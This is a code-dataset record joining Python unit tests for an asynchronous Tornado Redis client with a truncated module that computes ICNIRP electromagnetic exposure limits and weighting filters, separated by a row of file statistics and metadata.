res = yield gen.Task(self.client.getset, 'a', 2)
self.assertEqual(res, '1')
res = yield gen.Task(self.client.get, 'a')
self.assertEqual(res, '2')
self.stop()
@async_test
@gen.engine
def test_hash(self):
res = yield gen.Task(self.client.hmset, 'foo', {'a': 1, 'b': 2})
self.assertEqual(res, True)
res = yield gen.Task(self.client.hgetall, 'foo')
self.assertEqual(res, {'a': '1', 'b': '2'})
res = yield gen.Task(self.client.hdel, 'foo', 'a')
self.assertEqual(res, True)
res = yield gen.Task(self.client.hgetall, 'foo')
self.assertEqual(res, {'b': '2'})
res = yield gen.Task(self.client.hget, 'foo', 'a')
self.assertEqual(res, '')
res = yield gen.Task(self.client.hget, 'foo', 'b')
self.assertEqual(res, '2')
res = yield gen.Task(self.client.hlen, 'foo')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.hincrby, 'foo', 'b', 3)
self.assertEqual(res, 5)
res = yield gen.Task(self.client.hkeys, 'foo')
self.assertEqual(res, ['b'])
res = yield gen.Task(self.client.hvals, 'foo')
self.assertEqual(res, ['5'])
res = yield gen.Task(self.client.hset, 'foo', 'a', 1)
self.assertEqual(res, True)
res = yield gen.Task(self.client.hmget, 'foo', ['a', 'b'])
self.assertEqual(res, {'a': '1', 'b': '5'})
res = yield gen.Task(self.client.hexists, 'foo', 'b')
self.assertEqual(res, True)
self.stop()
@async_test
@gen.engine
def test_incrdecr(self):
res = yield gen.Task(self.client.incr, 'foo')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.incrby, 'foo', 10)
self.assertEqual(res, 11)
res = yield gen.Task(self.client.decr, 'foo')
self.assertEqual(res, 10)
res = yield gen.Task(self.client.decrby, 'foo', 10)
self.assertEqual(res, 0)
res = yield gen.Task(self.client.decr, 'foo')
self.assertEqual(res, -1)
self.stop()
@async_test
@gen.engine
def test_ping(self):
res = yield gen.Task(self.client.ping)
self.assertEqual(res, True)
self.stop()
@async_test
@gen.engine
def test_lists(self):
res = yield gen.Task(self.client.lpush, 'foo', 1)
self.assertEqual(res, True)
res = yield gen.Task(self.client.llen, 'foo')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.lrange, 'foo', 0, -1)
self.assertEqual(res, ['1'])
res = yield gen.Task(self.client.rpop, 'foo')
self.assertEqual(res, '1')
res = yield gen.Task(self.client.llen, 'foo')
self.assertEqual(res, 0)
self.stop()
@async_test
@gen.engine
def test_brpop(self):
res = yield gen.Task(self.client.lpush, 'foo', 'ab')
self.assertEqual(res, True)
res = yield gen.Task(self.client.lpush, 'bar', 'cd')
self.assertEqual(res, True)
res = yield gen.Task(self.client.brpop, ['foo', 'bar'], 1)
self.assertEqual(res, {'foo': 'ab'})
res = yield gen.Task(self.client.llen, 'foo')
self.assertEqual(res, 0)
res = yield gen.Task(self.client.llen, 'bar')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.brpop, ['foo', 'bar'], 1)
self.assertEqual(res, {'bar': 'cd'})
self.stop()
@async_test
@gen.engine
def test_brpoplpush(self):
res = yield gen.Task(self.client.lpush, 'foo', 'ab')
self.assertEqual(res, True)
res = yield gen.Task(self.client.lpush, 'bar', 'cd')
self.assertEqual(res, True)
res = yield gen.Task(self.client.lrange, 'foo', 0, -1)
self.assertEqual(res, ['ab'])
res = yield gen.Task(self.client.lrange, 'bar', 0, -1)
self.assertEqual(res, ['cd'])
res = yield gen.Task(self.client.brpoplpush, 'foo', 'bar')
self.assertEqual(res, 'ab')
res = yield gen.Task(self.client.llen, 'foo')
self.assertEqual(res, 0)
res = yield gen.Task(self.client.lrange, 'bar', 0, -1)
self.assertEqual(res, ['ab', 'cd'])
self.stop()
@async_test
@gen.engine
def test_sets(self):
    """Exercise single-set commands: SMEMBERS, SADD, SRANDMEMBER, SCARD,
    SREM, SMOVE, SISMEMBER, SPOP."""
    # A missing key behaves like an empty set.
    res = yield gen.Task(self.client.smembers, 'foo')
    self.assertEqual(res, set())
    res = yield gen.Task(self.client.sadd, 'foo', 'a')
    self.assertEqual(res, 1)
    res = yield gen.Task(self.client.sadd, 'foo', 'b')
    self.assertEqual(res, 1)
    res = yield gen.Task(self.client.sadd, 'foo', 'c')
    self.assertEqual(res, 1)
    # SRANDMEMBER is random, so only membership can be asserted.
    res = yield gen.Task(self.client.srandmember, 'foo')
    self.assertIn(res, ['a', 'b', 'c'])
    res = yield gen.Task(self.client.scard, 'foo')
    self.assertEqual(res, 3)
    res = yield gen.Task(self.client.srem, 'foo', 'a')
    self.assertEqual(res, True)
    res = yield gen.Task(self.client.smove, 'foo', 'bar', 'b')
    self.assertEqual(res, True)
    res = yield gen.Task(self.client.smembers, 'bar')
    self.assertEqual(res, set(['b']))
    res = yield gen.Task(self.client.sismember, 'foo', 'c')
    self.assertEqual(res, True)
    # SPOP is random in general, but 'c' is the only member left after
    # removing 'a' and moving 'b', so the result is deterministic here.
    res = yield gen.Task(self.client.spop, 'foo')
    self.assertEqual(res, 'c')
    self.stop()
@async_test
@gen.engine
def test_sets2(self):
    """Exercise multi-set algebra: SDIFF, SINTER, SUNION."""
    # foo = {a, b, c}
    res = yield gen.Task(self.client.sadd, 'foo', 'a')
    self.assertEqual(res, 1)
    res = yield gen.Task(self.client.sadd, 'foo', 'b')
    self.assertEqual(res, 1)
    res = yield gen.Task(self.client.sadd, 'foo', 'c')
    self.assertEqual(res, 1)
    # bar = {b, c, d}
    res = yield gen.Task(self.client.sadd, 'bar', 'b')
    self.assertEqual(res, 1)
    res = yield gen.Task(self.client.sadd, 'bar', 'c')
    self.assertEqual(res, 1)
    res = yield gen.Task(self.client.sadd, 'bar', 'd')
    self.assertEqual(res, 1)
    # SDIFF is order-sensitive: foo - bar vs bar - foo.
    res = yield gen.Task(self.client.sdiff, ['foo', 'bar'])
    self.assertEqual(res, set(['a']))
    res = yield gen.Task(self.client.sdiff, ['bar', 'foo'])
    self.assertEqual(res, set(['d']))
    res = yield gen.Task(self.client.sinter, ['foo', 'bar'])
    self.assertEqual(res, set(['b', 'c']))
    res = yield gen.Task(self.client.sunion, ['foo', 'bar'])
    self.assertEqual(res, set(['a', 'b', 'c', 'd']))
    self.stop()
@async_test
@gen.engine
def test_sets3(self):
    """Exercise the *STORE variants: SDIFFSTORE, SINTERSTORE, SUNIONSTORE.

    Each command returns the cardinality of the stored result set.
    """
    # foo = {a, b, c}
    res = yield gen.Task(self.client.sadd, 'foo', 'a')
    self.assertEqual(res, 1)
    res = yield gen.Task(self.client.sadd, 'foo', 'b')
    self.assertEqual(res, 1)
    res = yield gen.Task(self.client.sadd, 'foo', 'c')
    self.assertEqual(res, 1)
    # bar = {b, c, d}
    res = yield gen.Task(self.client.sadd, 'bar', 'b')
    self.assertEqual(res, 1)
    res = yield gen.Task(self.client.sadd, 'bar', 'c')
    self.assertEqual(res, 1)
    res = yield gen.Task(self.client.sadd, 'bar', 'd')
    self.assertEqual(res, 1)
    # foo - bar = {a}, stored in 'zar'.
    res = yield gen.Task(self.client.sdiffstore, ['foo', 'bar'], 'zar')
    self.assertEqual(res, 1)
    res = yield gen.Task(self.client.smembers, 'zar')
    self.assertEqual(res, set(['a']))
    res = yield gen.Task(self.client.delete, 'zar')
    self.assertEqual(res, True)
    # foo & bar = {b, c}.
    res = yield gen.Task(self.client.sinterstore, ['foo', 'bar'], 'zar')
    self.assertEqual(res, 2)
    res = yield gen.Task(self.client.smembers, 'zar')
    self.assertEqual(res, set(['b', 'c']))
    res = yield gen.Task(self.client.delete, 'zar')
    self.assertEqual(res, True)
    # foo | bar = {a, b, c, d}.
    res = yield gen.Task(self.client.sunionstore, ['foo', 'bar'], 'zar')
    self.assertEqual(res, 4)
    res = yield gen.Task(self.client.smembers, 'zar')
    self.assertEqual(res, set(['a', 'b', 'c', 'd']))
    self.stop()
@async_test
@gen.engine
def test_zsets(self):
    """Exercise sorted-set commands end to end: ZADD, ZSCORE, ZRANK,
    ZREVRANK, ZINCRBY, ZRANGE, ZREVRANGE, ZCARD, ZRANGEBYSCORE,
    ZREMRANGEBYRANK, ZREMRANGEBYSCORE, ZINTERSTORE and ZUNIONSTORE.
    """
    res = yield gen.Task(self.client.zadd, 'foo', 1, 'a')
    self.assertEqual(res, 1)
    res = yield gen.Task(self.client.zadd, 'foo', 2, 'b')
    self.assertEqual(res, 1)
    res = yield gen.Task(self.client.zscore, 'foo', 'a')
    self.assertEqual(res, 1)
    res = yield gen.Task(self.client.zscore, 'foo', 'b')
    self.assertEqual(res, 2)
    # Ranks are 0-based, ascending by score.
    res = yield gen.Task(self.client.zrank, 'foo', 'a')
    self.assertEqual(res, 0)
    res = yield gen.Task(self.client.zrank, 'foo', 'b')
    self.assertEqual(res, 1)
    res = yield gen.Task(self.client.zrevrank, 'foo', 'a')
    self.assertEqual(res, 1)
    res = yield gen.Task(self.client.zrevrank, 'foo', 'b')
    self.assertEqual(res, 0)
    # ZINCRBY returns the new score.
    res = yield gen.Task(self.client.zincrby, 'foo', 'a', 1)
    self.assertEqual(res, 2)
    res = yield gen.Task(self.client.zincrby, 'foo', 'b', 1)
    self.assertEqual(res, 3)
    res = yield gen.Task(self.client.zscore, 'foo', 'a')
    self.assertEqual(res, 2)
    res = yield gen.Task(self.client.zscore, 'foo', 'b')
    self.assertEqual(res, 3)
    # With scores the client yields (member, score) tuples.
    res = yield gen.Task(self.client.zrange, 'foo', 0, -1, True)
    self.assertEqual(res, [('a', 2.0), ('b', 3.0)])
    res = yield gen.Task(self.client.zrange, 'foo', 0, -1, False)
    self.assertEqual(res, ['a', 'b'])
    res = yield gen.Task(self.client.zrevrange, 'foo', 0, -1, True,)
    self.assertEqual(res, [('b', 3.0), ('a', 2.0)])
    res = yield gen.Task(self.client.zrevrange, 'foo', 0, -1, False)
    self.assertEqual(res, ['b', 'a'])
    res = yield gen.Task(self.client.zcard, 'foo')
    self.assertEqual(res, 2)
    res = yield gen.Task(self.client.zadd, 'foo', 3.5, 'c')
    self.assertEqual(res, 1)
    # ZRANGEBYSCORE positional args here: min, max, offset, count, with_scores.
    res = yield gen.Task(self.client.zrangebyscore, 'foo', '-inf', '+inf',
                         None, None, False)
    self.assertEqual(res, ['a', 'b', 'c'])
    res = yield gen.Task(self.client.zrangebyscore, 'foo', '2.1', '+inf',
                         None, None, True)
    self.assertEqual(res, [('b', 3.0), ('c', 3.5)])
    res = yield gen.Task(self.client.zrangebyscore, 'foo', '-inf', '3.0',
                         0, 1, False)
    self.assertEqual(res, ['a'])
    res = yield gen.Task(self.client.zrangebyscore, 'foo', '-inf', '+inf',
                         1, 2, False)
    self.assertEqual(res, ['b', 'c'])
    res = yield gen.Task(self.client.delete, 'foo')
    self.assertEqual(res, True)
    # Rebuild foo = {a:1, b:2, c:3, d:4} to test range removals.
    res = yield gen.Task(self.client.zadd, 'foo', 1, 'a')
    self.assertEqual(res, 1)
    res = yield gen.Task(self.client.zadd, 'foo', 2, 'b')
    self.assertEqual(res, 1)
    res = yield gen.Task(self.client.zadd, 'foo', 3, 'c')
    self.assertEqual(res, 1)
    res = yield gen.Task(self.client.zadd, 'foo', 4, 'd')
    self.assertEqual(res, 1)
    # Removes ranks 2..4, i.e. 'c' and 'd'.
    res = yield gen.Task(self.client.zremrangebyrank, 'foo', 2, 4)
    self.assertEqual(res, 2)
    # Removes scores 0..2, i.e. 'a' and 'b'.
    res = yield gen.Task(self.client.zremrangebyscore, 'foo', 0, 2)
    self.assertEqual(res, 2)
    # Three overlapping zsets used for the aggregate-store commands below:
    # a = {a1:1, a2:1, a3:1}, b = {a1:2, a3:2, a4:2}, c = {a1:6, a3:5, a4:4}.
    res = yield gen.Task(self.client.zadd, 'a', 1, 'a1')
    self.assertEqual(res, 1)
    res = yield gen.Task(self.client.zadd, 'a', 1, 'a2')
    self.assertEqual(res, 1)
    res = yield gen.Task(self.client.zadd, 'a', 1, 'a3')
    self.assertEqual(res, 1)
    res = yield gen.Task(self.client.zadd, 'b', 2, 'a1')
    self.assertEqual(res, 1)
    res = yield gen.Task(self.client.zadd, 'b', 2, 'a3')
    self.assertEqual(res, 1)
    res = yield gen.Task(self.client.zadd, 'b', 2, 'a4')
    self.assertEqual(res, 1)
    res = yield gen.Task(self.client.zadd, 'c', 6, 'a1')
    self.assertEqual(res, 1)
    res = yield gen.Task(self.client.zadd, 'c', 5, 'a3')
    self.assertEqual(res, 1)
    res = yield gen.Task(self.client.zadd, 'c', 4, 'a4')
    self.assertEqual(res, 1)
    # ZINTERSTORE
    # sum, no weight: only a1 and a3 are in all three sets.
    res = yield gen.Task(self.client.zinterstore, 'z', ['a', 'b', 'c'])
    self.assertEqual(res, 2)
    res = yield gen.Task(self.client.zrange, 'z', 0, -1, with_scores=True)
    self.assertEqual(res, [('a3', 8), ('a1', 9)])
    # max, no weight
    res = yield gen.Task(self.client.zinterstore, 'z', ['a', 'b', 'c'],
                         aggregate='MAX')
    self.assertEqual(res, 2)
    res = yield gen.Task(self.client.zrange, 'z', 0, -1, with_scores=True)
    self.assertEqual(res, [('a3', 5), ('a1', 6)])
    # with weight: a dict of key -> weight multiplies each score before summing.
    res = yield gen.Task(self.client.zinterstore, 'z',
                         {'a': 1, 'b': 2, 'c': 3})
    self.assertEqual(res, 2)
    res = yield gen.Task(self.client.zrange, 'z', 0, -1, with_scores=True)
    self.assertEqual(res, [('a3', 20), ('a1', 23)])
    # ZUNIONSTORE
    # sum, no weight
    res = yield gen.Task(self.client.zunionstore, 'z', ['a', 'b', 'c'])
    self.assertEqual(res, 4)
    res = yield gen.Task(self.client.zrange, 'z', 0, -1, with_scores=True)
    self.assertEqual(dict(res), dict(a1=9, a2=1, a3=8, a4=6))
    # max, no weight
    res = yield gen.Task(self.client.zunionstore, 'z', ['a', 'b', 'c'],
                         aggregate='MAX')
    self.assertEqual(res, 4)
    res = yield gen.Task(self.client.zrange, 'z', 0, -1, with_scores=True)
    self.assertEqual(dict(res), dict(a1=6, a2=1, a3=5, a4=4))
    # with weight
    res = yield gen.Task(self.client.zunionstore, 'z',
                         {'a': 1, 'b': 2, 'c': 3})
    self.assertEqual(res, 4)
    res = yield gen.Task(self.client.zrange, 'z', 0, -1, with_scores=True)
    self.assertEqual(dict(res), dict(a1=23, a2=1, a3=20, a4=16))
    self.stop()
@async_test
@gen.engine
def test_zset(self):
    """Bulk ZADD of NUM members whose score equals the member string;
    ZRANGE must return them in numeric score order.

    NOTE: uses py2 semantics — `map` returns a list and `xrange` exists.
    """
    NUM = 100
    long_list = map(str, xrange(0, NUM))
    for i in long_list:
        # Score and member are both the string i; redis parses the score.
        res = yield gen.Task(self.client.zadd, 'foobar', i, i)
        self.assertEqual(res, 1)
    res = yield gen.Task(self.client.zrange, 'foobar', 0, NUM,
                         with_scores=False)
    self.assertEqual(res, long_list)
    self.stop()
@gen.engine
def _make_list(self, key, items, callback=None):
    """Reset *key* then RPUSH every element of *items* onto it.

    Signals completion by invoking callback(True) when all pushes finish.
    """
    yield gen.Task(self.client.delete, key)
    for element in items:
        yield gen.Task(self.client.rpush, key, element)
    callback(True)
@async_test
@gen.engine
def test_sort(self):
    """Exercise SORT: default numeric sort, start/num windowing, BY and
    GET external-key patterns, DESC, ALPHA, STORE, and all of them combined.
    """
    # Sorting a missing key yields an empty list.
    res = yield gen.Task(self.client.sort, 'a')
    self.assertEqual(res, [])
    # _make_list pushes each character of the string as one element.
    yield gen.Task(self._make_list, 'a', '3214')
    res = yield gen.Task(self.client.sort, 'a')
    self.assertEqual(res, ['1', '2', '3', '4'])
    # LIMIT-style window: skip 1, take 2.
    res = yield gen.Task(self.client.sort, 'a', start=1, num=2)
    self.assertEqual(res, ['2', '3'])
    res = yield gen.Task(self.client.set, 'score:1', 8)
    self.assertEqual(res, True)
    res = yield gen.Task(self.client.set, 'score:2', 3)
    self.assertEqual(res, True)
    res = yield gen.Task(self.client.set, 'score:3', 5)
    self.assertEqual(res, True)
    yield gen.Task(self._make_list, 'a_values', '123')
    # BY pattern: each element is ranked by the value at score:<element>.
    res = yield gen.Task(self.client.sort, 'a_values', by='score:*')
    self.assertEqual(res, ['2', '3', '1'])
    res = yield gen.Task(self.client.set, 'user:1', 'u1')
    self.assertEqual(res, True)
    res = yield gen.Task(self.client.set, 'user:2', 'u2')
    self.assertEqual(res, True)
    res = yield gen.Task(self.client.set, 'user:3', 'u3')
    self.assertEqual(res, True)
    yield gen.Task(self._make_list, 'a', '231')
    # GET pattern: return the value at user:<element> instead of the element.
    res = yield gen.Task(self.client.sort, 'a', get='user:*')
    self.assertEqual(res, ['u1', 'u2', 'u3'])
    yield gen.Task(self._make_list, 'a', '231')
    res = yield gen.Task(self.client.sort, 'a', desc=True)
    self.assertEqual(res, ['3', '2', '1'])
    yield gen.Task(self._make_list, 'a', 'ecdba')
    # ALPHA is required for lexicographic sort of non-numeric elements.
    res = yield gen.Task(self.client.sort, 'a', alpha=True)
    self.assertEqual(res, ['a', 'b', 'c', 'd', 'e'])
    yield gen.Task(self._make_list, 'a', '231')
    # STORE returns the length of the stored destination list.
    res = yield gen.Task(self.client.sort, 'a', store='sorted_values')
    self.assertEqual(res, 3)
    res = yield gen.Task(self.client.lrange, 'sorted_values', 0, -1)
    self.assertEqual(res, ['1', '2', '3'])
    yield gen.Task(self.client.set, 'user:1:username', 'zeus')
    yield gen.Task(self.client.set, 'user:2:username', 'titan')
    yield gen.Task(self.client.set, 'user:3:username', 'hermes')
    yield gen.Task(self.client.set, 'user:4:username', 'hercules')
    yield gen.Task(self.client.set, 'user:5:username', 'apollo')
    yield gen.Task(self.client.set, 'user:6:username', 'athena')
    yield gen.Task(self.client.set, 'user:7:username', 'hades')
    yield gen.Task(self.client.set, 'user:8:username', 'dionysus')
    yield gen.Task(self.client.set, 'user:1:favorite_drink', 'yuengling')
    yield gen.Task(self.client.set, 'user:2:favorite_drink', 'rum')
    yield gen.Task(self.client.set, 'user:3:favorite_drink', 'vodka')
    yield gen.Task(self.client.set, 'user:4:favorite_drink', 'milk')
    yield gen.Task(self.client.set, 'user:5:favorite_drink', 'pinot noir')
    yield gen.Task(self.client.set, 'user:6:favorite_drink', 'water')
    yield gen.Task(self.client.set, 'user:7:favorite_drink', 'gin')
    yield gen.Task(self.client.set, 'user:8:favorite_drink', 'apple juice')
    yield gen.Task(self._make_list, 'gods', '12345678')
    # Everything at once: sort gods by username (desc, alpha), window 2..5,
    # project to favorite_drink, and store the result.
    res = yield gen.Task(self.client.sort, 'gods',
                         start=2,
                         num=4,
                         by='user:*:username',
                         get='user:*:favorite_drink',
                         desc=True,
                         alpha=True,
                         store='sorted')
    self.assertEqual(res, 4)
    res = yield gen.Task(self.client.lrange, 'sorted', 0, -1)
    self.assertEqual(res, ['vodka', 'milk', 'gin', 'apple juice'])
    self.stop()
@async_test
@gen.engine
def test_bit_commands(self):
    """SETBIT returns the bit's previous value; GETBIT reads it back."""
    key = 'TEST_BIT'
    # Fresh key: previous bit value is 0, hence falsy.
    res = yield gen.Task(self.client.setbit, key, 3, 1)
    self.assertFalse(res)
    res = yield gen.Task(self.client.getbit, key, 0)
    self.assertFalse(res)
    res = yield gen.Task(self.client.getbit, key, 3)
    self.assertTrue(res)
    # Clearing bit 3 returns its previous (set) value.
    res = yield gen.Task(self.client.setbit, key, 3, 0)
    self.assertTrue(res)
    res = yield gen.Task(self.client.getbit, key, 1)
    self.assertFalse(res)
    self.stop()
| 39.385057
| 79
| 0.56592
| 3,745
| 27,412
| 4.111615
| 0.06008
| 0.128848
| 0.193272
| 0.257696
| 0.884595
| 0.865177
| 0.838291
| 0.791986
| 0.710936
| 0.669308
| 0
| 0.018232
| 0.26565
| 27,412
| 695
| 80
| 39.441727
| 0.746696
| 0.005472
| 0
| 0.577107
| 0
| 0
| 0.05295
| 0.006935
| 0
| 0
| 0
| 0
| 0.349762
| 1
| 0.054054
| false
| 0
| 0.004769
| 0
| 0.060413
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
90893b90dc72a853a3f40b831767378604cf8496
| 25,779
|
py
|
Python
|
icnirp.py
|
giaccone/exposure
|
968545c98eeb00c5d65b11026d29779f7b459009
|
[
"MIT"
] | null | null | null |
icnirp.py
|
giaccone/exposure
|
968545c98eeb00c5d65b11026d29779f7b459009
|
[
"MIT"
] | null | null | null |
icnirp.py
|
giaccone/exposure
|
968545c98eeb00c5d65b11026d29779f7b459009
|
[
"MIT"
] | null | null | null |
# load modules
import numpy as np
def icnirp_limit(f, year, receptor, quantity):
    """Return ICNIRP basic restrictions or reference levels.

    Parameters
    ----------
    f (float, int or ndarray):
        frequency value(s) in Hz
    year (str):
        reference guidelines, '1998' or '2010'
    receptor (str):
        'occupational' or 'public'
    quantity (str):
        'B', 'J', 'Ecns' or 'Epns' (defined according to the guidelines)

    Returns
    -------
    limit (float or ndarray):
        limit value(s), always in S.I. units. A scalar input (or a
        single-element array) yields a Python scalar. Frequencies outside
        the intervals covered by the selected guideline remain 0.

    AUTHOR: Luca Giaccone (luca.giaccone@polito.it)
    DATE: 23.02.2016
    HISTORY:
    """
    # Promote scalar input to a one-element array so boolean masking works.
    if isinstance(f, (int, float)):
        f = np.array([f])
    # Initialize output; uncovered frequency bands stay at zero.
    limit = np.zeros(f.shape)
    # Each branch assigns the piecewise limit over disjoint frequency bands.
    if year == '1998':
        if receptor == 'occupational':
            if quantity == 'B':
                limit[f < 1] = 0.2
                limit[(f >= 1) & (f < 8)] = 0.2/f[(f >= 1) & (f < 8)]**2
                limit[(f >= 8) & (f < 25)] = 0.025/f[(f >= 8) & (f < 25)]
                limit[(f >= 25) & (f < 820)] = 25e-6/(f[(f >= 25) & (f < 820)]*1e-3)
                limit[(f >= 820) & (f < 65e3)] = 30.7e-6
                limit[(f >= 65e3) & (f < 1e6)] = 2e-6/(f[(f >= 65e3) & (f < 1e6)]*1e-6)
                limit[(f >= 1e6) & (f < 10e6)] = 2e-6/(f[(f >= 1e6) & (f < 10e6)]*1e-6)
                limit[(f >= 10e6) & (f < 400e6)] = 0.2e-6
                limit[(f >= 400e6) & (f < 2000e6)] = 0.01e-6*np.sqrt(f[(f >= 400e6) & (f < 2000e6)]*1e-6)
                limit[(f >= 2000e6) & (f <= 300e9)] = 0.45e-6
            elif quantity == 'J':
                limit[f < 1] = 40 * 1e-3
                limit[(f >= 1) & (f < 4)] = 40*1e-3/f[(f >= 1) & (f < 4)]
                limit[(f >= 4) & (f < 1000)] = 10*1e-3
                limit[(f >= 1000) & (f < 100e3)] = f[(f >= 1000) & (f < 100e3)]/100*1e-3
                limit[(f >= 100e3) & (f <= 10e6)] = f[(f >= 100e3) & (f <= 10e6)]/100 * 1e-3
        elif receptor == 'public':
            if quantity == 'B':
                limit[f < 1] = 4e-2
                limit[(f >= 1) & (f < 8)] = 4e-2 / f[(f >= 1) & (f < 8)] ** 2
                limit[(f >= 8) & (f < 25)] = 5e-3 / f[(f >= 8) & (f < 25)]
                limit[(f >= 25) & (f < 800)] = 5e-6 / (f[(f >= 25) & (f < 800)] * 1e-3)
                limit[(f >= 800) & (f < 3000)] = 6.25e-6
                limit[(f >= 3000) & (f < 150e3)] = 6.25e-6
                limit[(f >= 150e3) & (f < 1e6)] = 0.92e-6 / (f[(f >= 150e3) & (f < 1e6)] * 1e-6)
                limit[(f >= 1e6) & (f < 10e6)] = 0.92e-6 / (f[(f >= 1e6) & (f < 10e6)] * 1e-6)
                limit[(f >= 10e6) & (f < 400e6)] = 0.092e-6
                limit[(f >= 400e6) & (f < 2000e6)] = 0.0046e-6 * np.sqrt(f[(f >= 400e6) & (f < 2000e6)] * 1e-6)
                limit[(f >= 2000e6) & (f <= 300e9)] = 0.2e-6
            elif quantity == 'J':
                limit[f < 1] = 8*1e-3
                limit[(f >= 1) & (f < 4)] = 8*1e-3 / f[(f >= 1) & (f < 4)]
                limit[(f >= 4) & (f < 1000)] = 2*1e-3
                limit[(f >= 1000) & (f < 100e3)] = f[(f >= 1000) & (f < 100e3)] / 500 * 1e-3
                limit[(f >= 100e3) & (f <= 10e6)] = f[(f >= 100e3) & (f <= 10e6)] / 500 * 1e-3
    elif year == '2010':
        # 2010 guidelines only cover 1 Hz .. 10 MHz; below 1 Hz stays 0.
        if receptor == 'occupational':
            if quantity == 'B':
                limit[(f >= 1) & (f < 8)] = 0.2 / f[(f >= 1) & (f < 8)] ** 2
                limit[(f >= 8) & (f < 25)] = 2.5e-2 / f[(f >= 8) & (f < 25)]
                limit[(f >= 25) & (f < 300)] = 1e-3
                limit[(f >= 300) & (f < 3000)] = 0.3 / f[(f >= 300) & (f < 3000)]
                limit[(f >= 3000) & (f <= 10e6)] = 1e-4
            elif quantity == 'Ecns':
                limit[(f >= 1) & (f < 10)] = 0.5 / f[(f >= 1) & (f < 10)]
                limit[(f >= 10) & (f < 25)] = 0.05
                limit[(f >= 25) & (f < 400)] = 2e-3 * f[(f >= 25) & (f < 400)]
                limit[(f >= 400) & (f < 3000)] = 0.8
                limit[(f >= 3000) & (f <= 10e6)] = 2.7e-4 * f[(f >= 3000) & (f <= 10e6)]
            elif quantity == 'Epns':
                limit[(f >= 1) & (f < 3000)] = 0.8
                limit[(f >= 3000) & (f <= 10e6)] = 2.7e-4 * f[(f >= 3000) & (f <= 10e6)]
        elif receptor == 'public':
            if quantity == 'B':
                limit[(f >= 1) & (f < 8)] = 4e-2 / f[(f >= 1) & (f < 8)] ** 2
                limit[(f >= 8) & (f < 25)] = 5e-3 / f[(f >= 8) & (f < 25)]
                limit[(f >= 25) & (f < 50)] = 2e-4
                limit[(f >= 50) & (f < 400)] = 2e-4
                limit[(f >= 400) & (f < 3000)] = 8e-2 / f[(f >= 400) & (f < 3000)]
                limit[(f >= 3000) & (f <= 10e6)] = 2.7e-5
            elif quantity == 'Ecns':
                limit[(f >= 1) & (f < 10)] = 0.1 / f[(f >= 1) & (f < 10)]
                limit[(f >= 10) & (f < 25)] = 0.01
                limit[(f >= 25) & (f < 1000)] = 4e-4 * f[(f >= 25) & (f < 1000)]
                limit[(f >= 1000) & (f < 3000)] = 0.4
                limit[(f >= 3000) & (f <= 10e6)] = 1.35e-4 * f[(f >= 3000) & (f <= 10e6)]
            elif quantity == 'Epns':
                limit[(f >= 1) & (f < 3000)] = 0.4
                limit[(f >= 3000) & (f <= 10e6)] = 1.35e-4 * f[(f >= 3000) & (f <= 10e6)]
    # Collapse a single-element result back to a Python scalar
    # (idiomatic limit.item() instead of np.ndarray.item(limit)).
    if limit.size == 1:
        limit = limit.item()
    return limit
def icnirp_filter(year, receptor, quantity, domain, f=None, rc_series=None):
    """Build the ICNIRP weighting function (frequency domain) or weighting
    filter (time domain) for the weighted-peak method.

    Parameters
    ----------
    year (str):
        ICNIRP guidelines publication year, '1998' or '2010'
    receptor (str):
        'occupational' or 'public'
    quantity (str):
        physical quantity (e.g. 'B', 'J', 'Ecns', 'Epns')
    domain (str):
        'freq' or 'time'
    f (ndarray):
        required when domain='freq'; frequencies (Hz, may be signed) at
        which the weighting function is evaluated
    rc_series (str):
        optional, used with year='1998'. When 'y' the filter also models
        the magnitude/phase variation at extremely low frequency

    Returns
    -------
    (num, den) when domain='time':
        numerator and denominator coefficients (ndarray) of the analog
        weighting filter in descending powers of s
    (weight_fun, phase) when domain='freq':
        weighting magnitude and phase (degrees) at each frequency in f

    Notes
    -----
    Unsupported (year, receptor, quantity) combinations leave the outputs
    unassigned, so the final return raises NameError.

    AUTHOR: Luca Giaccone (luca.giaccone@polito.it)
    DATE: 23.11.2019
    HISTORY:
    """
    if year == '1998':
        if receptor == 'occupational':
            if quantity == 'B':
                if domain == 'freq':
                    # keep the sign of each frequency for the phase term
                    isgn = np.sign(f)
                    f = np.abs(f)
                    # weight = 1 / (limit * sqrt(2)): peak value of the limit
                    weight_fun = np.zeros(f.shape)
                    phase = np.zeros(f.shape)
                    weight_fun[f < 1] = 1 / (0.2 * np.sqrt(2))
                    weight_fun[(f >= 1) & (f < 8)] = 1 / (0.2 / f[(f >= 1) & (f < 8)] ** 2 * np.sqrt(2))
                    weight_fun[(f >= 8) & (f < 25)] = 1 / (0.025 / f[(f >= 8) & (f < 25)] * np.sqrt(2))
                    weight_fun[(f >= 25) & (f < 820)] = 1 / (25e-6 / (f[(f >= 25) & (f < 820)] * 1e-3) * np.sqrt(2))
                    weight_fun[f >= 820] = 1 / (30.7e-6 * np.sqrt(2))
                    phase[f < 820] = 90 * isgn[f < 820]
                elif domain == 'time':
                    if rc_series == 'y':
                        # corner angular frequencies (8 Hz and 820 Hz)
                        a = 2 * np.pi * 8
                        b = 2 * np.pi * 820
                        # gain k is fitted so |H| matches the limit at fref
                        fref = np.array([1e4])
                        s = 2j * np.pi * fref
                        Href = (s ** 2) / ((s + a) * (s + b))
                        lim_ref = icnirp_limit(fref, year, receptor, quantity) * np.sqrt(2)
                        k = (1.0 / (lim_ref * np.abs(Href))).item()
                        # H(s) = k*s^2 / ((s+a)(s+b))
                        num = np.array([k, 0, 0])
                        den = np.array([1, (a + b), (a * b)])
                    else:
                        # single corner at 820 Hz
                        a = 2 * np.pi * 820
                        fref = np.array([1e4])
                        s = 2j * np.pi * fref
                        Href = s / (s + a)
                        lim_ref = icnirp_limit(fref, year, receptor, quantity) * np.sqrt(2)
                        k = (1.0 / (lim_ref * np.abs(Href))).item()
                        # H(s) = k*s / (s+a)
                        num = np.array([k, 0])
                        den = np.array([1, a])
            elif quantity == 'J':
                if domain == 'freq':
                    isgn = np.sign(f)
                    f = np.abs(f)
                    weight_fun = np.zeros(f.shape)
                    phase = np.zeros(f.shape)
